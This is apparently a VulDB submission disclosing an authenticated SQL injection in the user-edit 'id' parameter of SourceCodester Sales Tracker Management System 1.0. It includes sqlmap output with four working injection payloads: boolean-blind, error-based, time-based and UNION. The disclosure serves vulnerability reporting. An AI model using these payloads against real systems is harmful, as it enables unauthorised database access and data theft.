Submit #93533: Authenticated SQL Injection on Sales Tracker System When edit Users

Info

Title: Authenticated SQL Injection on Sales Tracker System When edit Users
Description:

# Exploit Title: Authenticated SQL Injection on Sales Tracker System When edit users
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# Tested on: Windows 11
# Check Detailed write-up : http://ahmedismailozil.blogspot.com/

```
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' AND 6468=6468-- rJGN

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' OR (SELECT 4534 FROM(SELECT COUNT(*),CONCAT(0x71786b7871,(SELECT (ELT(4534=4534,1))),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ukvi

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' AND (SELECT 1530 FROM (SELECT(SLEEP(5)))BhAM)-- HmJE

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=-8360' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71786b7871,0x65786e556963514467496864494e4f4577696f4e76766b69444a454b77744c685470486e744e4f41,0x71786b7a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[09:48:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
```
Source: ⚠️ https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
User: mroz1l (UID 41497)
Submission: 23/02/2023 07:27 AM (3 years ago)
Moderation: 23/02/2023 04:15 PM (9 hours later)
Status: Accepted
VulDB Entry: 221679 [SourceCodester Sales Tracker Management System 1.0 Edit User manage_user id SQL injection]
Points: 20